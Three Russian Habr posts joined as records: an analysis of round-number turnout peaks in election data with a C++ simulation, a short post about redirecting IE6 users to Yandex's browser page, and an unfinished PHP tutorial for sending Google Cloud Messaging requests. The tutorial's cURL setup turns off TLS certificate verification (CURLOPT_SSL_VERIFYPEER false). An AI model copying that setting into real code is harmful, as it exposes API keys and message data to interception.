Это тот же самый график, который приведен выше, но ось X (белый цвет) теперь перенесена на Ось Y(правая) и отображается в виде отдельной линии, Ось Y(левая) так же как и раньше отображает кол-во УИК, а на оси X теперь отображается просто номер выборки из БД (номер точки по оси X по порядку).
Пояснение
Точке по оси X с номером 60 соответствует:
процент явки = 95
кол-во УИК = 1680
**График\_2б:**
Ось Х – номер точки из БД по порядку
Ось Y(левая) – Количество УИК
Ось Y(правая) – Процент явки (интервал = 0.1%)
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/6z/uf/vx/6zufvxpabkdpmwmneoi1ehqrlhi.png)
Давайте найдем на этом графике нашу круглую точку 80% (обведена красным кружком), которая на графике выше выглядела как пика с мелкими значениями вокруг себя.
Здесь она уже выглядит менее вычурно на линии с точками близкими ей по значению процента явки (желтые кружки).
**График\_2в:**
Ось Х – номер точки из БД по порядку
Ось Y(левая) – Количество УИК
Ось Y(правая) – Процент явки (интервал = 0.01%)
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/fg/vt/hs/fgvths9fsbho1l3meed2k4imxro.png)
А вот это уже интересно, те, кто разбирается в математике уже наверно начинают понимать в чем фишка. А точку 80% уже не различить, т.к. на этом масштабе она уже не видна.
**График\_2г:**
Ось Х – номер точки из БД по порядку
Ось Y(левая) – Количество УИК
Ось Y(правая) – Процент явки (интервал = 0.001%)
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/zt/hf/bm/zthfbmnfh4ik8diwe6yvphxqfxa.png)
А этот график – просто откровение. Можно даже посчитать кол-во ступенек в каждом периоде…
Ключ к решению загадки круглых чисел
------------------------------------
Ну и в качестве бонуса, любителям «конспиралогии» и математических ребусов посвящается:
`PROCENTX KOLVO X2 X5 X10
25 2 2 0 0
40 5 2 5 2
45 3 3 3 3
50 70 70 15 15
55 10 10 10 10
60 108 57 108 57
65 34 34 34 34
70 57 57 57 57
75 140 140 29 29
80 122 62 122 62
85 36 36 36 36
90 78 78 78 78
95 64 64 64 64
100 2613 1370 582 324`
Это красивая закономерность, которую я обнаружил в «круглых цифрах».
Суть в том, что начиная с точки 40% и далее с шагом 5% количество зарегистрированных избирателей в УИК всегда кратно 2, 5 или 10. Собственно таблица выше это отображает.
PROCENTX – процент явки
KOLVO – общее кол-во УИК ровно с данным процентом без каких-либо округлений
X2 – количество УИК в которых кол-во зарег. избирателей кратно 2
X5 – количество УИК в которых кол-во зарег. избирателей кратно 5
X10 – количество УИК в которых кол-во зарег. избирателей кратно 10
Далее, я решил проверить кратность с шагом 1…
`PROCENTX KOLVO X2 X5 X10
25 2 2 0 0
34 1 1 1 1
36 1 1 1 1
40 5 2 5 2
42 1 1 1 1
44 2 0 2 0
45 3 3 3 3
46 1 1 1 1
47 1 1 1 1
48 2 0 2 0
50 70 70 15 15
51 3 3 3 3
52 7 4 7 4
53 4 4 4 4
54 4 4 4 4
55 10 10 10 10
56 10 6 10 6
57 5 5 5 5
58 9 9 9 9
59 4 4 4 4
60 108 57 108 57
61 3 3 3 3
62 18 18 18 18
63 1 1 1 1
64 23 10 23 10
65 34 34 34 34
66 14 14 14 14
67 8 8 8 8
68 22 10 22 10
69 2 2 2 2
70 57 57 57 57
71 4 4 4 4
72 17 5 17 5
73 6 6 6 6
74 8 8 8 8
75 140 140 29 29
76 23 11 23 11
77 4 4 4 4
78 10 10 10 10
79 2 2 2 2
80 122 62 122 62
81 10 10 10 10
82 14 14 14 14
83 6 6 6 6
84 24 11 24 11
85 36 36 36 36
86 10 10 10 10
87 3 3 3 3
88 23 8 23 8
89 4 4 4 4
90 78 78 78 78
91 4 4 4 4
92 31 17 31 17
93 6 6 6 6
94 13 13 13 13
95 64 64 64 64
96 25 11 25 11
97 6 6 6 6
98 17 17 17 17
99 4 4 4 4
100 2613 1370 582 324`
Получается, что такая закономерность соблюдается кроме 100 на всех целых числах (в которых имеется ровно целое значение, если целого значения нет – оно в списке пропущено).
Ну и напоследок, общее разбиение по кратности количества зарегистрированных избирателей x2-10 для всех УИК:
`KOLVO X2 X3 X4 X5 X6 X7 X8 X9 X10
97699 49413 32753 24724 20283 16649 13923 12464 10917 10411`
KOLVO – общее кол-во УИК в которых проводились выборы
X2-10 – количество УИК в которых кол-во зарег. избирателей кратно 2-10
И общее разбиение по кратности пришедших на выборы избирателей x2-10 для всех УИК:
`KOLVO X2 X3 X4 X5 X6 X7 X8 X9 X10
97699 49268 32712 24634 20608 16492 14085 12192 10938 10752`
KOLVO – общее кол-во УИК в которых проводились выборы
X2-10 – количество УИК в которых кол-во пришедших избирателей кратно 2-10
Ну, а дальше обычно в таких случаях математики пишут… решение тривиально :)
Update:
Заключение
----------
Как ни странно, но моя статья оказалась довольно двусмысленна для тех, кто присоединился к обсуждению без чтения основной статьи на которую делался ответ и дискуссии, которая там велась. Поэтому добавлю здесь пояснения, в виде ответов на поставленные мной вопросы в начале статьи.
**Почему автор (исходной статьи) считает, что вместо «странных» пиков должно быть нормальное или логнормальное распределение?**
— Ответа я так и не получил.
Но, мое мнение такое — ожидать что, на графике голосования (где участвует разумный выбор) должно быть обязательно нормальное или логнормальное распределение — не верно.
**Почему вообще пики считаются «странными»?**
— В исходной статье на это была версия «Зато это можно объяснить тем, что при фальсификации председатели предпочитали комиссий брать «круглые» цифры процентов.», а так же «Потому, что я не вижу естественных причин их появления на круглых числах.»
**Откуда могут появиться «естественные» пики на круглых значениях?**
— Это уже был мой вопрос самому себе, для решения которого я просил автора исходной статьи выложить файл БД для возможности анализа.
Собственно эта статья на него и отвечает — по графикам График\_1в, График\_1г мы видим — что наличие пиков на обсуждаемом графике — вполне естественно, а причина их появления кроется в дроби
количество\_избирателей\_пришедших\_на\_выборы / количество\_избирателей\_зарегистрированных\_на\_участке
Значение которой имеет более высокую вероятность оказаться «круглым» чем другие, это подтверждается данными из раздела «Ключ к решению загадки круглых чисел». Но надо иметь в виду, что под «круглыми» значениями здесь понимаются «ровно круглые» значения без какого либо округления, т.е. иллюстрируемые пики на График\_1г и График\_1в. На График\_1б — значения уже сильно округлены и к «ровно круглым» значениям, добавляются значения из ближайших окрестностей, поэтому «естественность» пик на «ровно круглых» значениях оказывает уже гораздо меньше влияния чем «разумный выбор». Поэтому появление высоких пик на круглых значениях в реальном голосовании, показанная нами «естественность» не объясняет. Но, то что они существуют и могут быть усилены «разумным выбором» вполне вероятно.
**Дополнительные пояснения**Вся статья задумывалась как некая загадка, которую можно решить если использовать логику и минимум математических знаний. Само решение, благодаря подсказкам в виде графиков и данных «ключа», на мой взгляд, казалось настолько очевидным, что большинству читателей потребуется минимум усилий, чтобы понять о чем речь. Но, теперь ясно, что это не так, и как говорится телепатов нет, и эта «загадочность» больше путает, чем помогает понять смысл статьи.
Вот дополнительные пояснения (я буду нумеровать тезисы, чтобы можно было на них ссылаться в случае несогласия):
Графики 2абвг строились для визуализации моей мысли о том, что три точки стоящие рядом друг с другом по порядку на графиках 1абвг — между собой никак не связаны.
Т.е. например 79,80,81 — включают в себя совершенно разные по параметрам УИКи (размер, гео-расположение, разумность избирателей) и никакой прямой связи между этими точками нет, т.е. допустим пика на 80 относительно 79 и 81 пикой является только в силу того, что на числовой прямой эти числа стоят рядом и дополнительной смысловой нагрузки не несет. Т.е. нет никакой «обязательности» в том, чтобы изменения значения процента явки между этими точками было всегда ниже некого субъективного порога, выше которого это изменение можно назвать «пикой». Упрощенно – наличие пик на графиках 1бвг, вызывает у некоторых читателей субъективное чувство «не естественности», т.к. они видят, что в других местах график выглядит более гладко, это происходит из-за некоего подсознательного ожидания нормального распределения функции на графике. Но такое ожидание является заблуждением. Для иллюстрации этого заблуждения и были показаны графики 2абвг. Суть этих графиков в том, что отображают они ровно одни и те же данные, что на графиках 1абвг, но кол-во субъективных «аномалий» сильно отличается.
Графики 2абвг отсортированы не по возрастанию процента явки, как 1абвг, а по возрастанию кол-ва УИКов. Естественно, пики по количеству УИКов пропали, они идут по возрастанию, но теперь появилась ломаная кривая (белого цвета), на которой мы и будем искать «пики». Т.е. мы пытаемся найти «аномалии» на другой визуализации одних и тех же данных.
**Давайте посмотрим на График\_2а (шаг 1%):**
В зависимости от субъективного выбора и наших ожиданий на графике, мы можем, как обнаружить здесь «аномалии», так и считать что их нет.
Их нет, если посмотреть по линии 56% или 68% и т.п… то все колебания (нижние, верхние пики рядом с этими линиями) особо не выделяются.
Они есть, если мы будем использовать логику «аномалий» из графика 1абвг, где «аномальность» формулировалась вопросом «Как может быть так, чтобы явка X% была на большом кол-ве УИК, а (X-1)% и (X+1)% на маленьком?», то здесь «аномальность» формулируется вопросом «Почему в точке X – с N кол-вом УИКов высокий процент явки, а в точках (X+1) и (X-1) (в которых N+1 и N-1 не сильно отличаются от N) процент явки гораздо ниже?»
И в наличии и в отсутствии аномалий есть некая логика, давайте посмотрим, куда она нас заведет дальше.
**График\_2б (шаг 0.1%):**
Здесь, если мы считали, что на График\_2а – нет аномалий, мы в этом дополнительно убеждаемся. Это показано на примере линии с 80%, если на график\_1б 80% — это одинокая пика, то здесь рядом с линией 80% есть еще множество значений близких к 80% (отмечены желтыми кружками).
А вот если мы придерживаемся понятия «аномальности» для графиков 1бвг, то здесь у нас вообще всё в пиках и одна сплошная «аномальность» никаких «гладких» мест на линии белого цвета практически нет.
Таким образом, в зависимости от способа визуализации и выбранного критерия «аномальности», мы можем придти к двум совершенно противоположным выводам.
**График\_2в (шаг 0.01%):**
На этом масштабе интересен тот факт, что по оси X уже выводится достаточно много точек, чтобы увидеть, как изменяется процент явки для УИКов с одинаковым количеством зарегистрированных избирателей. Внутри каждой уже достаточно широкой ступеньки располагается некое распределение явки и это распределение уже можно сравнивать между разными ступеньками. В комментарии к графику я дал намек на то, что любители математики должны явно заметить вид периодической функции и некую «аномалию» из-за того, что в ней меняется ширина периода (согласен, так себе был намек :).
**График\_2г (шаг 0.001%):**
Ну… а здесь я просто откровенно прикололся, показав, что «аномалии» можно буквально создавать из воздуха. На графике – реальные данные, и если проверить значения каждой точки – все честно, при этом мы видим явно «искусственные» ступеньки, которые должны безапелляционно «доказывать», что выборы «нарисованы».
На самом деле секрет прост. На нашем графике сортировка идет по количеству УИКов, и на одной ступеньке (фиолетовый цвет) мы видим множество УИКов, каждому из которых соответствует свой процент явки (на белой линии), так вот, все ступеньки идут по возрастанию, а что происходит внутри ступенек? А внутри ступенек мы можем делать, все что угодно. На предыдущем графике мы внутри ступенек отсортировали УИКи по возрастанию у них процента явки… и получилась, такая изогнутая плавно возрастающая линия. А здесь сортировка внутри ступенек вообще была отключена и они выводились на график в той последовательности, в которой хранятся в БД (бинарное дерево или что-то вроде того), что привило к рисованию таких вот ступенек процента явки (на белой линии).
Ну и собственно мой первый тезис:
**Тезис 1:**
От выбранного способа визуализации зависит количество некой субъективной «аномальности» на графике. Причем, всё зависит от того, что мы понимаем под «аномальностью». Пики на графике 1бвг – субъективно некоторыми людьми считаются «аномальностью» лишь из-за «геометрической» близости точек с высоким и низким значением (без какого-либо доказательства, что таких пиков на графике быть не должно), замечу еще раз, что кроме «геометрической» близости между этими точками никакой связи нет. Грубо говоря, мы можем сортировать их всё новым, и новым способом находя всё новые и новые «геометрические» аномалии, которые не несут в себе никакой смысловой нагрузки. Вот когда появится доказательство, что пиков на какой-то визуализации быть не должно, а они там есть – вот тогда, такая визуализация имеет смысл.
Теперь пояснения по графикам 1абвг:
Здесь мы разбираем тот вариант, когда за «доказательство» на запрет появления пиков выдается «не знание способа, как эти пики могут появиться естественным путем». Т.е. для некоторых людей, появление пиков на круглых значениях – очень маловероятное событие и кроме как вмешательством «конспиралогических» факторов необъяснимое.
**График\_1а (шаг 1%):**
Это базовый график, на котором нет «аномалий».
**График\_1б (шаг 0.1%):**
Это график, в котором автор исходной статьи обнаружил и показал «аномальные» пики на круглых значениях. И да, действительно, если на этой визуализации следовать логике «геометрической» близости точек и ожидать нормального распределения, то пики – это анамалия.
**График\_1в (шаг 0.01%):**
Здесь мы уменьшаем шаг и уже видим гораздо больше пиков, причем они разбросаны по всему графику. О чем это говорит? Что мы обнаружили еще больше аномалий? Или может для данного графика пики просто сами по себе являются нормальным явлением?
**График\_1г (шаг 0.001%):**
Ну, тут ответ на вопрос выше очевиден – весь график состоит из пик, значит либо весь график – аномалия, либо пики – это нормальное (естественное) явление для данной визуализации, и значит бездоказательно считать, что пики на графике График\_1б «аномалия» — это ошибка. Ибо утверждать, что пики маловероятны мы уже не можем.
**Тезис 2:**
На графиках 1абвг – просто голословное утверждение, что пики «маловероятны» — не является доказательством «аномальности» пиков, так как на График\_1а их нет, а на всех последующих График\_бвг с уменьшением шага их становится всё больше и больше.
Ну и собственно разгадка пиков на круглых значениях:
По графикам График\_1в, График\_1г мы видим — что наличие пиков на обсуждаемом графике — вполне естественно, а причина их появления кроется в дроби:
количество\_избирателей\_пришедших\_на\_выборы / количество\_избирателей\_зарегистрированных\_на\_участке
Значение которой имеет более высокую вероятность оказаться «круглым» чем другие, это подтверждается данными из раздела «Ключ к решению загадки круглых чисел».
Визуально, подсказка на это дается в графике График\_1д, где видно пустую воронку вокруг значения 80%.
Входные данные для задачи:
1. По таблице мы видим, что в точки для всех «круглых» значений процента явки – попадают только УИКи в которых кол-во зарег. избирателей кратно 2,5 или 10.
2. Далее приведены таблицы с данными по кратности 2,3,4,5,6,7,8,9,10 для всех УИКов
по кол-ву пришедших на выборы избирателей (числитель)
и
по кол-ву зарег. избирателей (знаменатель)
Ну а дальше, можно посчитать вероятности по появлению интересующих значений, но это я уже оставляю на откуп читателям статьи. Если кому-то нужно, могу привести больше данных по кратности.
Еще просто для справки:
Минимальный размер (кол-во зарег.избирателей) УИКа = 3 чел
Максимальный = 7746 чел
Update2:
**Модель выборов на основе кратности размеров УИКов из раздела 'Ключ'**Я думаю такой модели, которая может симулировать реальный «разумный выбор» всей страны создать невозможно :)
Но, я могу построить модель, которая будет использовать реальные данные по голосованию и мы посмотрим, что получится. В разделе «ключ» изначально были представлены таблицы с данными по кратности, я их выложил с самого начала, так как по моим прикидкам вероятности, которые они описывают, как раз и являются «ключом» к решению проблемы. Но формулы и расчеты это одно, а практика это другое… давайте проверим.
Вот визуализация, основанная на таблице кратности размеров УИК:
Шаг выборки (1%)
[](https://habrastorage.org/webt/40/as/ig/40asigsrt0c5taqjxjukp-h1d1k.png)
Шаг выборки (0.1%)
[](https://habrastorage.org/webt/zn/q4/rw/znq4rwbsrtnji0eutvdodizq4ak.png)
Шаг выборки (0.01%)
[](https://habrastorage.org/webt/dr/8j/dy/dr8jdyi4rcg7grsvsinm8rxgfvu.png)
Шаг выборки (0.001%)
[](https://habrastorage.org/webt/zy/ka/km/zykakmwxh-vdnfh2xk73etxwc3k.png)
Таблицы из раздела «ключ»:
Общее разбиение по кратности количества зарегистрированных избирателей x2-10 для всех УИК:
KOLVO X2 X3 X4 X5 X6 X7 X8 X9 X10
97699 49413 32753 24724 20283 16649 13923 12464 10917 10411
KOLVO – общее кол-во УИК в которых проводились выборы
X2-10 – количество УИК в которых кол-во зарег. избирателей кратно 2-10
И общее разбиение по кратности пришедших на выборы избирателей x2-10 для всех УИК:
KOLVO X2 X3 X4 X5 X6 X7 X8 X9 X10
97699 49268 32712 24634 20608 16492 14085 12192 10938 10752
KOLVO – общее кол-во УИК в которых проводились выборы
X2-10 – количество УИК в которых кол-во пришедших избирателей кратно 2-10
**Как работает модель:**
0. По таблице рассчитывается вероятность появления числа кратного X2-X10
VerX2 = X2 / KOLVO
VerX3 = X3 / KOLVO
…
1. Запускается цикл по кол-ву УИКов = 97699
2. Для каждого УИКа случайно генерируется его размер из реального диапазона 3 — 7746 чел
3. В соответствии с вероятностью выбирается кратность УИКа, и от случайного размера УИКа — вычитается остаток от деления на кратное число. Если ни одна из вероятностей не сработала, то размер УИКа остается без изменения (случайным).
4. Случайно выбирается кол-во человек пришедших на выборы в УИК из диапазона 0… размер УИКа.
5. В соответствии с вероятностью выбирается кратность человек пришедших в УИК и от этого числа — вычитается остаток от деления на кратное число. Если ни одна из вероятностей не сработала, то кол-во человек остается без изменения (случайным).
6. Считается явка и в массиве результата соответствующему явке увеличивается кол-во УИК на +1.
7. По массиву результата строится график
**Вот код на c++**
```
int k_uchastok = 97699;
int arr[] = {49413 ,32753 ,24724 ,20283 ,16649 ,13923 ,12464 ,10917 ,10411};
std::vector all\_kratnost(arr, arr + sizeof(arr) / sizeof(int));
std::vector ver\_kratnost(all\_kratnost.size());
for (int i = 0; i < all\_kratnost.size(); i++)
{
ver\_kratnost[i] = (double)all\_kratnost[i] / (double)k\_uchastok;
}
int arr2[] = {49268, 32712, 24634, 20608, 16492, 14085, 12192, 10938, 10752};
std::vector all\_kratnost2(arr2, arr2 + sizeof(arr2) / sizeof(int));
std::vector ver\_kratnost2(all\_kratnost2.size());
for (int i = 0; i < all\_kratnost2.size(); i++)
{
ver\_kratnost2[i] = (double)all\_kratnost2[i] / (double)k\_uchastok;
}
for (int i = 0; i < k\_uchastok; i++)
{
// Случайное значение от 0 до 1
double ver\_value = (double)rand() / RAND\_MAX ;
uik\_size = 3 + rand()%7743;
int k;
for (k = 0; k < all\_kratnost.size(); k++)
{
if (ver\_value < ver\_kratnost[k])
{
// кратно 2+k
int ostatok = uik\_size % (k+2);
if (uik\_size > (ostatok+3))
{
uik\_size -= ostatok;
}
uik\_yavka = uik\_size - rand()%uik\_size;
// Случайное значение от 0 до 1
double ver\_value2 = (double)rand() / RAND\_MAX ;
for (int k2 = 0; k2 < all\_kratnost2.size(); k2++)
{
if (ver\_value2 < ver\_kratnost2[k2])
{
// кратно 2+k2
int ostatok = uik\_yavka % (k2+2);
if (uik\_yavka > ostatok)
{
uik\_yavka -= ostatok;
}
break;
}
else
{
ver\_value2 -= ver\_kratnost2[k2];
}
}
procentx = (double)uik\_yavka / uik\_size;
procentx = RoundTo(procentx \* 100.0, round\_digits);
result\_map[procentx] += 1;
break;
}
else
{
ver\_value -= ver\_kratnost[k];
}
}
// ни одна вероятность не сработала
if (k == all\_kratnost.size())
{
uik\_yavka = uik\_size - rand()%uik\_size;
procentx = (double)uik\_yavka / uik\_size;
procentx = RoundTo(procentx \* 100.0, round\_digits);
result\_map[procentx] += 1;
}
}
std::map::iterator it;
for (it = result\_map.begin(); it != result\_map.end(); ++it)
{
m\_BarSeries\_Bottom->AddXY(it->first, it->second);
}
```
Как видно из графиков на шаге 1%, пиков нет. На шаге 0.1% — есть, в том числе и на круглых значениях (90,85,80,75,70,65,60,50...). Сгенерировав график десяток раз можно подобрать конфигурацию пиков на свой вкус :) Такая длинная последовательность «круглых» чисел появляется не всегда, обычно есть пропуски или склеивания, но за примерно 10 генераций ее можно увидеть если искать по всему графику и учитывать все пики, а не только 5 самых высоких.
**Замечания:**
Естественно — это очень упрощенная модель выборов. Я бы сказал это модель выборов где в реальных УИКах все люди выбирают между пойти/не пойти на выборы подбрасывая монетку (поэтому пика 50% обычно выше других, хотя это не обязательно (например на графике с 0.1% я выбрал вариант где самая высокая пика не 50%)). Но как мы видим, само физическое распределение размера УИКов по кратности и кол-ва пришедших избирателей — уже является причиной появления пиков на «случайном выборе», а когда добавляется «разумный выбор» эти пики уже могут усиливаться или ослабляться в зависимости от распределения «разумного выбора».
**Заключение:**
Считаю, что показанная выше модель пиков вполне объясняет их возможность «естественного» происхождения и на реальном графике выборов (в силу того, что использует вероятности взятые из реальных данных). Пики — это не «аномалия», это скажем так, базовые классы, которые отображают некую обобщенную тенденцию выбора.
Update3:
**Еще более реальная модель по настоящим размерам УИКов из БД**
Теперь мы не будем генерировать размеры УИКа случайно, а возьмем реально каждый УИК в БД с его реальным размером и сгенерируем для него абсолютно случайную явку от 0 до размера УИКа.
Т.е. в симуляции мы полностью воспроизводим выборы в РФ на всех реально существующих в ней УИКах, но «разумный выбор» заменяем монеткой «пойти/не пойти».
График для шага 1%
(Пики на ровно «круглых» значениях с кратностью 5 выделены желтой линией. Подсвечиваются все пики в которых ровно круглое значение выше чем ближайшие справа и слева.).
[](https://habrastorage.org/webt/cc/0z/vo/cc0zvo7o5alxp8prvnkkk7ue4li.png)
Графики для шага 0.1%
Привожу для примера 5 генераций.
1
[](https://habrastorage.org/webt/mw/ug/mj/mwugmjf5ovtmulynqyj7tnwmb5k.png)
2
[](https://habrastorage.org/webt/rc/ix/v6/rcixv6cvslkbjt6xibh-vr5cnnw.png)
3
[](https://habrastorage.org/webt/1l/mx/p-/1lmxp-ms9oommdhlhznco-tf3wk.png)
4
[](https://habrastorage.org/webt/1n/vo/dc/1nvodctg_rndbgrsbtbtluoiz6m.png)
5
[](https://habrastorage.org/webt/7y/za/qh/7yzaqhjb87jzbred0eakay9e7ce.png)
Графики для шага 0.01%
[](https://habrastorage.org/webt/mx/1p/b9/mx1pb9pn5bms2t4qjczwj2g8mjm.png)
Графики для шага 0.001%
[](https://habrastorage.org/webt/j3/ci/1g/j3ci1gurdxjeyfqqbqunkmzlx9w.png)
**Выводы:**
1. Мы видим — что пики это абсолютно нормальное явление на шаге 0.1% и тем более на 0.01% и 0.001%.
2. Мы видим, что пики на **ровно «круглых» значениях с кратностью 5** — стабильно существуют на графике обычно в диапазоне (9 — 16 шт).
3. На шаге 0.001% — пики на «круглых» значениях включают в себя только ровно то количество УИКов, которое к ним относится. Далее при увеличении шага и округлении, к пикам добавляются значения из их ближайших окрестностей. При этом высота пик на «круглых» значениях перестает доминировать, на 0.01% это не очень заметно, а вот на графике 0.1% мы в зависимости от случайности в генерации уже можем увидеть наличие последовательности высоких пик на круглых значениях (сравнимых с самыми высокими пиками на графике) реже, но они стабильно появляются на графике.
Можно сказать, что **существование высоких пик на круглых значениях с шагом 0.001%** — связано с более высокой вероятностью появления целого значения в дроби при расчете явки. А вот дальнейшее распределение пик при более мелких шагах с округлением, уже больше зависит от «разумного выбора».
При симуляции выборов по реальному кол-ву и размерам УИКов мы использовали логику подбрасывания монетки, естественно результаты такой симуляции нельзя напрямую сравнивать с результатами реального голосования но, мы точно показали что:
* Пики на круглых значениях стабильно существуют на нашем голосовании монеткой и это является подтверждением их «естественности».
* Размеры пик на «круглых» значениях сопоставимы по размерам с пиками на «не круглых» значениях, но редко могут на много превышать другие пики с не круглыми значениями. Поэтому появление высоких пик на круглых значениях в реальном голосовании, показанная нами «естественность» не объясняет. Но, то что они существуют и могут быть усилены «разумным выбором» вполне вероятно.
P.S.
Да и еще, в виду отрицательной кармической ситуации не могу отвечать сразу всем на комментарии в статье, поэтому кому пока не ответил извините :) | https://habr.com/ru/post/354020/ | null | ru | null |
# Сайт про браузеры от Яндекса и как можно его использовать
Привет хабражители! Странно что замечательный небольшой ресурс [Яндекс.Браузеры](http://browser.yandex.ru/) до сих пор никак у нас не упомянут, даже в комментариях. А ведь он может пригодиться не только простым обывателям, но и разработчикам сайтов.

На хабре уже не раз поднималась тема о том, что делать с заскорузлыми пользователями IE6. Кто-то старательно оптимизирует под них верстку и ничем себя не выдает, кто-то делает то же самое но еще и выдает грозные окошки о устаревшем браузере. А кто-то просто автоматически редиректит их на разнообразные странички, объясняющие весь ужас ситуации, со ссылками на современные альтернативы в виде Оперы, Фаерфокса и Хрома.
Я на последних своих проектах все больше симпатизирую последней из перечисленных групп. И проект Яндекса стал той самой дорогой, по которой мои посетители идут в «светлое будущее».
Вот что примерно они увидят первым делом:

Плюс перечисление преимуществ новой версии Internet Explorer и несколько альтернатив для него — на выбор.
Почему именно [Яндекс.Браузеры](http://browser.yandex.ru/)? Причин несколько.
Во-первых, на мой взгляд очень немаловажный фактор — доверие. Пользователь скорее с гораздо большей вероятностью будет качать что-то с «родного» и знакомого Яндекса, нежели с подавляющего большинства других сайтов, в том числе вашего. Особенно если посетитель новый, а не старый (лояльный).
Во-вторых, их репозиторий своевременно обновляется самыми последними версиями и максимально отказоустойчив.
Единственный недостаток на который можно обратить внимание — это не нравящийся некоторым людям «вкус» Яндекса =) Хотя, если не ошибаюсь, пользователь во время установки может отменить привязку Бара и прочих плюшек, поставив чистый браузер.
Поехали?
> `\* This source code was highlighted with Source Code Highlighter.` | https://habr.com/ru/post/116155/ | null | ru | null |
# Google Cloud Messaging – пишем backend на PHP
В рамках туториала мы напишем полноценный класс для отправки сообщений на GCM сервер, который:
* получает на вход массив данных для отправки
* формирует пакеты для отправки размером до 4096кб каждый.
* отправляет пакеты параллельными запросами.
* анализирует ответ и знает:
+ успешно доставлено ли сообщение
+ тип ошибки
#### Google Cloud Messaging – коротко и ясно
GCM – это сервис доставки мгновенных сообщений. Альтернатива стандартным polling и long polling, но не исключающая, а дополняющая их. Гарантии, что сообщение будет доставлено Гугл не дает (хотя надежность и скорость доставки стала просто космической по сравнению с предком C2DM). Если на телефоне интернет выключен, то сообщение будет храниться на GCM сервере до 4х недель. Т.е если пользователь выключил телефон, уехал в отпуск, то по приезду сообщение он может уже не получить. Поэтому GCM должен работать только вместе с надежными способами доставки такими как, например, элементарный polling – отправка http запросов на сервер каждые N минут.
Любое android приложение может зарегистрировать себя в качестве получателя сообщений от GCM. При включенном интернете регистрация происходит за считанные секунды. Как только это произошло приложение получает от GCM сервера RegistrationId, который нужно отправить на свой сервер. В итоге в базе сервера мы имеем, например, таблицу Devices, хранящую информацию об устройствах, включая их RegistrationId.
Чтобы устройства начали получать сообщения серверный код должен отправлять POST запросы на GCM сервер в формате json (можно отправлять и обычные ключ => значение, но рекомендуется именно json). Ответ сервера также содержит json, проанализировав который мы сможем понять доставлено ли сообщение, а если нет — какие ошибки произошли.
#### Приступим
Создадим два класса GcmPayload и GcmSender.
**Листинг**
```
class GcmPayload {
public function __construct($regId, $jsons) {}
public $regId;
public $jsons;
}
class GcmSender {
public function __construct($payloads) {}
public function send() {}
protected function getPackages() {}
protected function isReadyToFlush($items, $json) {}
public function onResponse($response, $info, RollingCurlRequest $request) {}
}
```
В терминологии GCM payload – это данные, которые вы хотите отправить получателю. Эти данные должны храниться в значении ключа data и имеют ограничение в 4096 байт. [Подробнее про формат запроса](http://developer.android.com/google/gcm/gcm.html#request).
GcmPayload – модель данных для одного получателя и соответственно одного RegistrationId. Поле $jsons должно быть проинициализировано массивом json’ов в виде строк, содержащих данные, которые нужно отправить этому получателю. Для упрощения туториала считаем, что это делается вне нашего класса, например, так:
**Листинг**
```
$recipients = $messagesRepository->getRecipientsWithNewMessages();
$payloads = array();
foreach ($recipients as $recipient) {
$jsons = array();
foreach ($recipient->messages as $message) {
$jsons[] = json_encode($message);
}
$payloads[] = new GcmPayload($recipient[‘regId’], $jsons);
}
$gcm = new GcmSender();
$gcm->send($payloads);
```
#### GcmSender
##### Константы и члены класса
const GCM\_API\_KEY = 'your api key'; // Нужно получить на странице Google APIs Console
const CURL\_TIMEOUT = 10; // Таймаут соединения в сервером Гугл в секундах
const GCM\_MAX\_DATA\_SIZE = 4096; //Лимит на отправляемые данные в байтах
const GCM\_SERVER\_URL = 'https://android.googleapis.com/gcm/send'; //адрес GCM сервера
const GCM\_MAX\_CONNECTIONS = 10; // количество параллельных запросов
const KEY\_REG\_IDS = 'registration\_ids'; //ключ получателей в json запросе
const KEY\_DATA = 'data'; //ключ с данными в json запросе
const KEY\_ITEMS = 'items'; //ключ в объекте data, содержащий наш массив данных
const REGID\_PLACEHOLDER = '\_REGID\_'; //плэйсхолдер для RegistrationId в json шаблоне запроса
const ITEMS\_PLACEHOLDER = '\_ITEMS\_'; //плэйсхолдер для массива наших данных в json шаблоне запроса
const GCM\_ERROR\_NOTREGISTERED = 'NotRegistered'; //константа для ошибки, если пользователь удалил приложение
protected $\_template; //json шаблон запроса
protected $\_baseDataSize; //изначальный размер данных, который включает ключ items, кавычки скобки и т.д.
##### конструктор
Конструктор создает шаблон запроса, который будет использоваться в методе getPackages. Обратите внимание, чтобы потенциально не превысить лимит в 4096 байт на данные, нужно также запомнить и учесть в дальнейшем размер изначальных данных в шаблоне: {«items»: []}
**Листинг**
```
public function __construct() {
$dataObj = '{"'.self::KEY_ITEMS.'": ['.self::ITEMS_PLACEHOLDER.']}';
$this->_template = '{
"'.self::KEY_REG_IDS.'": ["'.self::REGID_PLACEHOLDER.'"],
"'.self::KEY_DATA.'": '.$dataObj.'
}';
$baseDataJson = str_replace(self::ITEMS_PLACEHOLDER, '', $dataObj);
$this->_baseDataSize = strlen($baseDataJson);
}
```
##### Метод send
Это паблик метод должен вызываться для непосредственной отправки данных на GCM сервер. Метод принимает данные для отправки, которые методом getPackages преобразутся в пакеты данных – подготовленные post данные в формате json (один пакет – один запрос) и гарантированно не превышающие 4096 байт. Остальная часть метода – это инициализация замечательной библиотеки [RollingCurl](http://code.google.com/p/rolling-curl/), которая инкапсулирует в себе работу с curl\_multi\_exec и позволяет отправлять запросы параллельно и писать прозрачный код. RollingCurl инициализируем нашим колбэк методом onResponse, в котором будем анализировать результат отправки. Далее идет непосредственно сама отправка данных.
**Листинг**
```
/**
* @param GcmPayload[] $payloads
*/
public function send($payloads) {
$packages = self::getPackages($payloads);
if (!$packages || count($packages) == 0) return;
$rc = new RollingCurl(array($this, 'onResponse'));
$headers = array('Authorization: key='.self::GCM_API_KEY, 'Content-Type: application/json');
$rc->__set('headers', $headers);
$rc->options = array(
CURLOPT_SSL_VERIFYPEER => false, //отключаем проверку сертификата
CURLOPT_RETURNTRANSFER => true, //указываем, что хотим получить ответ в виде строки
CURLOPT_CONNECTTIMEOUT => self::CURL_TIMEOUT, // сколько секунд пытаться установить соединение
CURLOPT_TIMEOUT => self::CURL_TIMEOUT); //сколько времени должны выполняться функции curl
foreach ($packages as $package) {
$rc->request(self::GCM_SERVER_URL, 'POST', $package);
}
$rc->execute(self::GCM_MAX_CONNECTIONS);
}
```
##### Метод getPackages
